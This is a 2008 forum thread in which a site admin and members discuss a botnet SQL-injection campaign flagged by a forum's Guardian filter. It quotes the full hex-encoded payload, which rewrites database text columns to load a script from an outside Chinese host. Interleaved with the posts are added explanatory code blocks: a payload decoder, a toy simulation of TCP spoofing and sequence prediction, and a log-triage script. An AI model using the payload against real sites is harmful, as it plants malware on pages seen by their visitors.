Scripting Abuse Detected: Guardian (Read 28971 times)
Rad
Radministrator
Sufferin' succotash
Posts: 4090
Newport Beach, California
Scripting Abuse Detected: Guardian
Aug 8th, 2008 at 11:12pm
 
Been getting lots of these notices (several hundred) the last few days:

Quote:
Scripting Abuse Detected! on Today at 10:09pm

Abusing user ID (Real Name): Guest -> ()
Abuse detected from IP: 122.231.132.86
Blocked script in Url data: cast(0x4445434c415245204054207661726368617228323535292c40432076617263686172283430303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d5b272b40432b275d2b2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f73646f2e313030306d672e636e2f63737273732f772e6a73223e3c2f7363726970743e3c212d2d272720776865726520272b40432b27206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f73646f2e313030306d672e636e2f63737273732f772e6a73223e3c2f7363726970743e3c212d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as char(4000))

Radified Community Forums, The Guardian

Any idea what's up with that? And what I can do about it?
I traced out the IPs and they come from all over the planet.
 
 

Rad
Re: Scripting Abuse Detected: Guardian
Reply #1 - Aug 8th, 2008 at 11:13pm
 
Here's another:

Quote:
Scripting Abuse Detected! on Today at 9:56pm

Abusing user ID (Real Name): Guest -> ()
Abuse detected from IP: 61.158.77.50
Blocked script in Url data: cast(0x4445434c415245204054207661726368617228323535292c40432076617263686172283430303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d5b272b40432b275d2b2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f73646f2e313030306d672e636e2f63737273732f772e6a73223e3c2f7363726970743e3c212d2d272720776865726520272b40432b27206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f73646f2e313030306d672e636e2f63737273732f772e6a73223e3c2f7363726970743e3c212d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as char(4000))

Radified Community Forums, The Guardian

It's the same character string, from different IPs.
 
 
Nigel Bree
Ex Member
Re: Scripting Abuse Detected: Guardian
Reply #2 - Aug 8th, 2008 at 11:40pm
 
It's a form of SQL injection attack; the script itself (the "cast" and such) is a small piece of SQL, and the attackers are trying to probe and see if any web-facing sites pass the content to a back-end database which will execute it. Inside that - the character data wrapped inside the "cast" - is another piece of script that is the next stage of payload and tries to modify all the tables.

This is just a kind of attack that's become flavour of the month; it's been hitting a lot of sites over the last couple of months (typical discussion e.g. at http://sqlblog.com/blogs/denis_gobo/archive/2008/06/25/7491.aspx), especially a lot of forums.

There's probably not anything you can do about it, since they will most likely be originated from compromised machines in botnets, and your system is catching them anyway.
 
 
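Decoding the quoted string shows exactly the two stages Nigel describes. The following is an added example, not code from the thread, from YaBB or from The Guardian: it re-joins the hex string quoted in the first post (the forum wrapped it across lines), decodes the CAST(0x... AS CHAR(4000)) wrapper, and pulls out what a responder wants to know first, namely the injected script source and which column types the cursor walks. The names `decode_cast_payload` and `triage` and the xtype lookup table are this example's own; its handling of the NVARCHAR (UTF-16LE) form goes beyond the single CHAR(4000) case the thread shows.

```python
"""Decode and triage the hex-encoded CAST() payload quoted in the Guardian notices.

Added example; not code from the thread, from YaBB or from The Guardian. The hex
string is the one quoted in the first post, re-joined across the forum's line
wraps. Function names, the xtype table and the nvarchar handling are this example's own.
"""
import re

# "Blocked script in Url data:" from the first notice, chunked exactly as the forum wrapped it.
URL_DATA = "cast(0x" + "".join([
    "4445434c415245204054207661726368617228323535292c4043207661726368617228343",
    "0303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c6",
    "5637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636",
    "f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d2775272",
    "0616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e787479706",
    "53d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204",
    "645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c40432",
    "05748494c4528404046455443485f5354415455533d302920424547494e206578656328277570646",
    "17465205b272b40542b275d20736574205b272b40432b275d3d5b272b40432b275d2b2727223e3c2",
    "f7469746c653e3c736372697074207372633d22687474703a2f2f73646f2e313030306d672e636e2",
    "f63737273732f772e6a73223e3c2f7363726970743e3c212d2d272720776865726520272b40432b2",
    "7206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d226874747",
    "03a2f2f73646f2e313030306d672e636e2f63737273732f772e6a73223e3c2f7363726970743e3c2",
    "12d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544",
    "f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f4341544",
    "5205461626c655f437572736f72",
]) + " as char(4000))"

# SQL Server system type ids as stored in syscolumns.xtype; the payload filters on four of them.
XTYPE_NAMES = {35: "text", 99: "ntext", 167: "varchar", 175: "char",
               231: "nvarchar/sysname", 239: "nchar"}

CAST_RE = re.compile(
    r"cast\(\s*0x(?P<hex>[0-9a-f]+)\s+as\s+(?P<type>n?(?:var)?char)\(\d+\)\)", re.I)


def decode_cast_payload(url_data):
    """Return the T-SQL hidden in CAST(0x... AS [N][VAR]CHAR(n)), or None if there is
    none or the hex is unusable. An N-type literal is UTF-16LE, otherwise single-byte."""
    m = CAST_RE.search(url_data)
    if m is None or len(m["hex"]) % 2:          # odd nibble count: truncated or garbled
        return None
    raw = bytes.fromhex(m["hex"])
    try:
        return raw.decode("utf-16-le" if m["type"].lower().startswith("n") else "ascii")
    except UnicodeDecodeError:
        return None


def triage(tsql):
    """What a responder wants first: what is injected, into which columns, and how."""
    lower = tsql.lower()
    urls = sorted(set(re.findall(r'<script\s+src="([^"]+)"', tsql, re.I)))
    xtypes = sorted({int(x) for x in re.findall(r"\bxtype\s*=\s*(\d+)", tsql, re.I)})
    return {
        "script_urls": urls,
        "target_xtypes": {x: XTYPE_NAMES.get(x, "unknown") for x in xtypes},
        "enumerates_schema": "sysobjects" in lower and "syscolumns" in lower,
        "mass_update": re.search(r"exec\(\s*'update\s", tsql, re.I) is not None,
    }


if __name__ == "__main__":
    sql = decode_cast_payload(URL_DATA)
    print(sql)
    for key, value in triage(sql).items():
        print(f"{key}: {value}")
```

The decoded text is a cursor over every user table and every text, ntext, varchar and nvarchar column in it, appending `"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--` to each value that does not already carry it; the hex wrapper exists so that keyword filters looking for UPDATE or `<script` in the URL see neither. It only does anything on a site that concatenates the URL parameter into a SQL Server query, which is why a Perl forum with no database sees nothing but the Guardian block.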
 
Rad
Re: Scripting Abuse Detected: Guardian
Reply #3 - Aug 18th, 2008 at 3:15pm
 
Quote:
see if any web-facing sites pass the content to a back-end database which will execute it.

YaBB does not use a database. (It's all Perl-based, not PHP+MySQL like most forums, so the attack does not seem very intelligent.) Lack of database support has actually been one of YaBB's biggest negatives. YaBB 3.0 will be the first version to support databases .. if they ever finish.

I have started banning IPs. Have banned maybe 50 or 100. Here's the latest: 67.242.22.100. Normally between 2 and 6 attacks per IP. Rarely more. I am wondering if this is really from a small number of PCs using IP spoofing. And how I might tell. (You would know, I'm sure.)

The attack continues, though it seems to be waning. Only 50 attacks today. I get an email for every one. Lots of emails to delete.
 
 
MrMagoo
Übermensch
Resident Linux Guru
Posts: 1026
Phoenix, AZ (USA)
Re: Scripting Abuse Detected: Guardian
Reply #4 - Aug 18th, 2008 at 9:22pm
 
$ nslookup 67.242.22.100
Server:         10.249.60.17
Address:        10.249.60.17#53

Non-authoritative answer:
100.22.242.67.in-addr.arpa      name = cpe-67-242-22-100.twcny.res.rr.com.

That particular IP address belongs to a Road Runner (Time Warner Cable Internet) customer. This leads me to believe the attacks are coming from infected PCs behind dynamic IP addresses. If that is the case, blocking IPs will be marginally effective. These computers are probably part of a large bot-net someone is using to try to take over web sites.

IP spoofing isn't really necessary in this case. They don't need to hide where they are coming from, since they are coming from infected computers participating in a bot-net rather than the attackers using their own computers.

It also isn't very likely they are spoofing their IPs. If they sent you a packet with a fake IP, your web server would try to respond to that packet by sending a reply to the spoofed IP. Since it is spoofed, the computer that gets that reply won't respond to it, since it didn't send the original packet. So 2-way communication cannot take place with a spoofed IP. Since HTTP runs on TCP, and TCP requires 2-way communication, I don't think it is technically possible to spoof the IP in this case.

Spoofing can happen in communication streams that don't require 2-way communication. UDP is one protocol that doesn't require 2-way communication. DNS and DHCP both utilize UDP, and therefore could be (and often are during attacks) spoofed.
 
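MrMagoo's point about TCP can be seen directly in a model of the handshake. This is an added example, not part of the thread: it simulates the three-way handshake over a toy in-memory network whose routing delivers each segment only to the owner of its destination address, so a forged source never sees the reply. The addresses (RFC 5737 documentation ranges), the `Network`, `Server` and `Client` classes and the two ISN policies are this example's own constructions. It also carries the one caveat a practitioner would add to the post: the blind spoof fails only as long as the server's initial sequence number is unguessable; with the old predictable-increment ISNs the attacker can forecast it and complete the forged handshake (the classic sequence-prediction attack), which is why modern stacks randomise the ISN.

```python
"""Why a blind source-IP spoof cannot complete a TCP handshake, and when it can.

Added example, not part of the original thread. Toy in-memory network; addresses,
classes and ISN policies are this example's own constructions.
"""
import random
from dataclasses import dataclass

ISN_STEP = 64_000   # increment used by the "predictable" policy (old BSD-style ISNs)
MOD = 2 ** 32       # sequence numbers are 32-bit


@dataclass
class Segment:
    src: str
    dst: str
    flags: str      # "SYN", "SYN-ACK", "ACK" or "RST"
    seq: int = 0
    ack: int = 0


class Network:
    """Routes a segment to whoever owns seg.dst and routes the reply in turn. Like IP,
    nothing ever goes back to the machine that emitted a segment, only to seg.dst."""
    def __init__(self):
        self.hosts = {}

    def attach(self, host):
        self.hosts[host.addr] = host

    def send(self, seg):
        target = self.hosts.get(seg.dst)
        if target is None:                 # nobody owns that address: dropped silently
            return
        reply = target.receive(seg)
        if reply is not None:
            self.send(reply)


class Server:
    def __init__(self, addr, isn_policy="random", rng=None):
        self.addr, self.isn_policy = addr, isn_policy
        self.rng = rng or random.Random()
        self.last_isn = 1_000_000
        self.half_open = {}                # peer addr -> ISN we put in the SYN-ACK
        self.established = set()

    def next_isn(self):
        if self.isn_policy == "random":
            self.last_isn = self.rng.getrandbits(32)
        else:
            self.last_isn = (self.last_isn + ISN_STEP) % MOD
        return self.last_isn

    def receive(self, seg):
        if seg.flags == "SYN":
            isn = self.next_isn()
            self.half_open[seg.src] = isn
            return Segment(self.addr, seg.src, "SYN-ACK", seq=isn, ack=(seg.seq + 1) % MOD)
        if seg.flags == "ACK" and seg.src in self.half_open:
            if seg.ack == (self.half_open[seg.src] + 1) % MOD:   # peer proved it saw our ISN
                del self.half_open[seg.src]
                self.established.add(seg.src)
        elif seg.flags == "RST":
            self.half_open.pop(seg.src, None)                     # peer never asked: abort
        return None


class Client:
    def __init__(self, addr, rng=None):
        self.addr = addr
        self.rng = rng or random.Random()
        self.pending = {}      # server addr -> our ISN
        self.seen_isn = {}     # server addr -> the server ISN we last observed

    def connect(self, net, server_addr):
        isn = self.rng.getrandbits(32)
        self.pending[server_addr] = isn
        net.send(Segment(self.addr, server_addr, "SYN", seq=isn))

    def receive(self, seg):
        if seg.flags != "SYN-ACK":
            return None
        self.seen_isn[seg.src] = seg.seq
        if seg.src in self.pending and seg.ack == (self.pending.pop(seg.src) + 1) % MOD:
            return Segment(self.addr, seg.src, "ACK", seq=seg.ack, ack=(seg.seq + 1) % MOD)
        return Segment(self.addr, seg.src, "RST")   # unsolicited SYN-ACK: a real stack resets


def legitimate_connect(net, client, server):
    client.connect(net, server.addr)
    return client.addr in server.established


def blind_spoof(net, spoofed_src, server, guess_isn):
    """SYN then ACK with a forged source. The SYN-ACK is routed to spoofed_src, so the
    sender never sees the server's ISN and has to supply guess_isn instead."""
    net.send(Segment(spoofed_src, server.addr, "SYN", seq=1))
    net.send(Segment(spoofed_src, server.addr, "ACK", seq=2, ack=(guess_isn + 1) % MOD))
    return spoofed_src in server.established


def predict_and_spoof(net, attacker, spoofed_src, server):
    """Sequence prediction: learn the current ISN via a legitimate connection from the
    attacker's own address, forecast the next one, then run the forged handshake."""
    legitimate_connect(net, attacker, server)
    return blind_spoof(net, spoofed_src, server, (attacker.seen_isn[server.addr] + ISN_STEP) % MOD)


def run_scenarios(seed=1):
    """Four handshakes on one toy network; returns which of them the server accepted."""
    rng = random.Random(seed)
    net = Network()
    victim = Client("198.51.100.7", rng)          # live host whose address gets forged
    attacker = Client("192.0.2.5", rng)           # the attacker's real address
    random_srv = Server("203.0.113.10", "random", rng)
    weak_srv = Server("203.0.113.20", "predictable")
    for host in (victim, attacker, random_srv, weak_srv):
        net.attach(host)
    return {
        "legitimate": legitimate_connect(net, victim, random_srv),
        # Forged SYN-ACK reaches the live victim, which RSTs the half-open connection.
        "spoof_live_host": blind_spoof(net, victim.addr, weak_srv, weak_srv.last_isn + ISN_STEP),
        # Silent forged address, random ISN: the forecast is one guess in 2**32.
        "spoof_silent_random_isn": predict_and_spoof(net, attacker, "198.51.100.99", random_srv),
        # Silent forged address, predictable ISN: the forecast is exact.
        "spoof_silent_predictable_isn": predict_and_spoof(net, attacker, "198.51.100.99", weak_srv),
    }
```

Two of the four outcomes carry the lesson. A forged address that belongs to a live host fails even with a perfect ISN guess, because that host answers the unsolicited SYN-ACK with a RST and the server drops the half-open connection. A forged address that nobody answers fails against random ISNs but succeeds against predictable ones, which is the Mitnick-era attack and the reason ISN randomisation exists; it is also why a bot sending HTTP requests from its own cable-modem address, as in this thread, has no reason to spoof at all.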
 
Rad.Test
Technoluster
Rad's non-Admin test-profile in Firefox
Posts: 108
Re: Scripting Abuse Detected: Guardian
Reply #5 - Aug 18th, 2008 at 10:14pm
 
MrMagoo wrote on Aug 18th, 2008 at 9:22pm:
If that is the case, blocking IP's will be marginally effective.

Why only marginally? And why attack a forum that is known to have no database with a SQL attack?

This security stuff is interesting.

Here are all the blocked IPs:

Code:
71.221.152.83
123.187.143.122
166.82.17.60
218.93.188.87
124.132.208.60
218.208.124.130
118.167.70.29
200.104.87.71
98.28.106.213
84.155.204.181
189.159.27.109
80.200.32.39
151.204.61.226
24.242.242.122
12.144.73.250
72.86.76.182
220.113.89.24
12.144.73.250
65.191.42.241
84.84.18.20
24.19.189.108
68.32.49.143
69.231.149.194
77.41.89.81
220.174.102.252
219.154.206.13
70.169.193.27
116.23.41.91
219.147.65.252
219.130.69.146
125.82.219.95
119.11.80.198
59.42.221.50
24.125.66.161
221.207.164.97
117.200.241.233
220.129.137.122
61.227.22.23
220.246.95.145
189.205.182.218
189.205.182.218
203.218.6.47
91.140.79.71
116.226.82.23
218.93.188.87
121.16.192.197
218.208.124.130
123.187.143.122
222.107.215.85
123.192.170.186
71.221.152.83
60.179.254.43
24.103.46.33
58.33.32.149
220.212.236.73
121.167.39.171
76.127.185.65
121.16.216.196
76.127.185.65
124.132.146.114
61.229.54.35
92.20.1.186
99.224.20.34
90.5.66.176
76.205.95.85
61.18.170.16
76.179.218.112
83.167.100.9
203.162.3.155
24.188.204.84
207.59.128.42
61.18.170.1
61.18.170.240
121.167.39.171
60.221.11.110
76.172.51.182
75.21.229.216
12.72.73.76
84.226.15.172
60.221.11.110
200.106.98.93
222.80.164.231
98.199.3.96
96.240.54.80
24.166.24.234
69.105.59.154
202.64.34.144
75.248.74.120
71.142.54.100
68.46.25.73
69.73.82.227
75.85.132.208
151.197.183.213
98.176.45.250
70.50.231.215
70.181.87.6
209.30.133.21
83.63.223.8
68.57.210.241
98.221.0.108
68.191.106.251
76.190.213.99
66.69.149.149
190.160.118.199
69.105.59.154
82.143.237.110
201.214.32.144
67.242.22.100
217.136.120.128
72.54.200.137
76.252.189.158
85.179.145.238
24.228.56.111
84.193.173.155
97.82.229.156
 
 
 

Nigel Bree
Re: Scripting Abuse Detected: Guardian
Reply #6 - Aug 19th, 2008 at 12:42am
 
Rad.Test wrote on Aug 18th, 2008 at 10:14pm:
Why only marginally?

Because those launching such wide-scale automated attacks have a truly enormous number of compromised machines to launch them from.

Quote:
And why attack a forum that is known to have no database with a SQL attack?

Because they don't know that. The typical way such automated attacks select victims is via Web indexes like Google; they are mostly looking for anything indexed with URLs that match certain patterns that are suggestive of scripts which *might* have a database back end.

Essentially, these kinds of scripts are written with quite simple positive-match rules; since those who launch these kinds of attacks have enormous distributed computing power at their disposal, it costs them nothing to launch these probes relatively indiscriminately. The authors of the scripts that direct the compromised machines don't need to bother carefully crafting their patterns to only select vulnerable targets; anything that is vaguely similar will do, since it costs them nothing to try.

Quote:
This security stuff is interesting.

Meh. Less so than you'd think, honestly. It's fun to break badly-designed systems, and guys like Peter Gutmann certainly can make it sound fun, but when you're on the inside having to design systems that are proof against various kinds of attack it's mostly deathly dull, and the politics and paperwork requirements are soul-destroying.
 
 
 
Nigel Bree
Re: Scripting Abuse Detected: Guardian
Reply #7 - Aug 19th, 2008 at 8:32pm
 
Actually, I should qualify that. Some of the math in cryptography is insanely beautiful. Taking the time to develop a full appreciation for the elegance of it and all the supporting structure is well worth it.

[ For that, it's good to be familiar with second-year college linear algebra to get up to speed with the basics of fields, groups, and rings (and vector spaces) and how many unusual systems can be built using the same techniques as Peano arithmetic but with different twists. ]

Then, grab a good standard undergraduate text like Cormen/Leiserson/Rivest. One of the real pleasures of this particular text is the chapter where none other than Ron Rivest himself guides you through both the number theory (albeit rapidly) and algorithms of the RSA cryptosystem.

This particular book is a great companion to Knuth's work since it not only covers some different areas and is more accessible, but retains the same real joy which is located in the exercises. Reading Knuth without doing the exercises is missing half the story, and it's the same here. It's also one of the few undergraduate-level texts ever written which covers important topics like splay trees and binomial heaps, to say nothing of the graph-theoretic chapters which as I've noted before really do matter.
 
 
 
Rad
Re: Scripting Abuse Detected: Guardian
Reply #8 - Aug 22nd, 2008 at 11:27pm
 
The Cormen/Rivest book, though published in 2001, currently has an Amazon sales rank of 827, which is one of the lowest I've ever seen, meaning it's still selling very strongly.

Quote:
it's good to be familiar with second-year college linear algebra  

Never had linear algebra, because my degree didn't require more than 2 semesters of calculus. I am very strong in regular algebra. (Would that be non-linear?)

As I understand it, this SQL injection attack asks for database info. So I don't understand why I would get ~50 such attacks from the same IP (220.136.2.233) in 1 or 2 minutes.

After the first one or two return no results, wouldn't the attacking source move on?

Quote:
Algorithm Complexity: you need to know Big-O. It's a must. If you struggle with basic big-O complexity analysis, then you are almost guaranteed not to get hired. It's, like, one chapter in the beginning of one theory of computation book, so just go read it. You can do it.

Big post. Could be a small book.
 
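Rad.Test's ban list in Reply #5 has duplicate entries and no counts behind it, and Rad's question above about ~50 hits from one address in a minute or two is exactly what a per-source tally answers. This added example is not code from the thread, from YaBB or from The Guardian: it parses notices laid out the way the two quoted in the first post are, counts hits per source address, reports bursts inside a sliding time window, and merges the sources of CAST() probes into a deduplicated, numerically sorted ban list. The notices it runs on are constructed (their times and counts are invented and the short hex is a stand-in for the real payload; only the addresses that appear in the thread are real), and every function name is this example's own.

```python
"""Triage of Guardian "Scripting Abuse Detected!" notices: hits per source, bursts, ban list.

Added example; not code from the thread, from YaBB or from The Guardian. The notice
layout follows the two notices quoted in the first post. The sample notices are
constructed: invented times and counts, a stand-in CAST() hex, and only the
addresses that appear in the thread are real.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address

REFERENCE_DAY = datetime(2008, 8, 22)   # what "Today at ..." in a notice is taken to mean

NOTICE_RE = re.compile(
    r"Scripting Abuse Detected! on (?P<when>[^\n]+)\n"
    r".*?Abuse detected from IP: (?P<ip>\d{1,3}(?:\.\d{1,3}){3})\n"
    r".*?Blocked script in Url data: (?P<data>[^\n]*)", re.S)
# Signature of the hex-encoded CAST() probe seen in the thread (char and nvarchar forms).
CAST_PROBE_RE = re.compile(r"cast\(\s*0x[0-9a-f]+\s+as\s+n?(?:var)?char\(\d+\)\)", re.I)


def parse_when(text, today=REFERENCE_DAY):
    """Guardian stamps either 'Today at 10:09pm' or 'Aug 8th, 2008 at 11:12pm'."""
    if text.startswith("Today at "):
        t = datetime.strptime(text[len("Today at "):], "%I:%M%p")
        return today.replace(hour=t.hour, minute=t.minute)
    text = re.sub(r"(\d)(?:st|nd|rd|th)\b", r"\1", text)      # drop the ordinal suffix
    return datetime.strptime(text, "%b %d, %Y at %I:%M%p")


def parse_notices(text, today=REFERENCE_DAY):
    """One event per notice: when, source address, blocked URL data, and whether it is the probe."""
    return [{"when": parse_when(m["when"], today), "ip": m["ip"], "data": m["data"],
             "cast_probe": CAST_PROBE_RE.search(m["data"]) is not None}
            for m in NOTICE_RE.finditer(text)]


def hits_per_ip(events):
    return Counter(e["ip"] for e in events)


def bursts(events, window=timedelta(minutes=2), threshold=10):
    """Per source, the most hits inside any `window`; only sources reaching `threshold`
    are reported. Sliding window over the sorted timestamps of each source."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e["when"])
    out = {}
    for ip, times in by_ip.items():
        times.sort()
        best = i = 0
        for j, t in enumerate(times):
            while t - times[i] > window:
                i += 1
            best = max(best, j - i + 1)
        if best >= threshold:
            out[ip] = best
    return out


def ban_list(existing, events):
    """Merge an existing ban list (duplicates and all) with the sources of CAST() probes,
    deduplicated and sorted as addresses rather than as strings."""
    addrs = set(existing) | {e["ip"] for e in events if e["cast_probe"]}
    return sorted(addrs, key=ip_address)


def build_sample_notices():
    """Constructed notices in the layout quoted in the thread (not real log data)."""
    def notice(when, ip, data):
        return (f"Scripting Abuse Detected! on {when}\n\n"
                f"Abusing user ID (Real Name): Guest -> ()\n"
                f"Abuse detected from IP: {ip}\n"
                f"Blocked script in Url data: {data}\n\n"
                f"Radified Community Forums, The Guardian\n\n")
    probe = "cast(0x73656c6563742031 as char(4000))"   # stand-in hex ('select 1'), not the real payload
    text = ""
    for i in range(50):                                  # the ~50-in-two-minutes case Rad describes
        text += notice(f"Today at 10:{9 + i // 25:02d}pm", "220.136.2.233", probe)
    for when in ("Aug 18th, 2008 at 1:05pm", "Aug 18th, 2008 at 2:40pm", "Aug 18th, 2008 at 7:15pm"):
        text += notice(when, "67.242.22.100", probe)     # a few hits spread over hours
    text += notice("Aug 8th, 2008 at 10:09pm", "122.231.132.86", probe)
    text += notice("Today at 11:30pm", "198.51.100.20", "<script>alert(1)</script>")  # not the probe
    return text


if __name__ == "__main__":
    events = parse_notices(build_sample_notices())
    print(hits_per_ip(events).most_common(3))
    print(bursts(events))
    print(ban_list(["71.221.152.83", "12.144.73.250", "12.144.73.250", "189.205.182.218"], events))
```

A source that fires dozens of identical probes inside two minutes and then goes quiet is what an infected host running a loop looks like; the tally gives the evidence behind Nigel's and MrMagoo's reading of the traffic, and the deduplicated list is the form a ban list should take before it is fed back into the forum's blocking configuration.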
 
Nigel Bree
Re: Scripting Abuse Detected: Guardian
Reply #9 - Aug 23rd, 2008 at 1:06am
 
Rad wrote on Aug 22nd, 2008 at 11:27pm:
after the first 1 or two return no results, wouldn't the attacking source move on?

Normally, you'd expect so, but remember that most malicious code isn't exactly well-written or well-tested (going all the way back to Robert T. Morris and the original Internet Worm). Many of the negative effects of malicious code like viruses (which are first and foremost designed to propagate) tend to just be bugs in them, not intentional.

 
 
 
Nigel Bree
Re: Scripting Abuse Detected: Guardian
Reply #10 - Aug 23rd, 2008 at 2:42am
 
Rad wrote on Aug 22nd, 2008 at 11:27pm:
i am v. strong in regular algebra. (would that be non-linear?)

Mostly, yeah. "Regular" algebra mostly involves solving systems of equations with polynomials, which isn't "linear" because most of the unknown terms have been raised to some power, and the results you're mostly looking for are numbers on the real line.

Linear algebra is mostly about vectors and matrices - those can be considered polynomials too, but they have what is called an orthogonal basis - the basis is made up of vectors that point in different directions, and thus form a space with >1 dimension. For instance, 1 and i form the basis of the complex plane.
 
 
 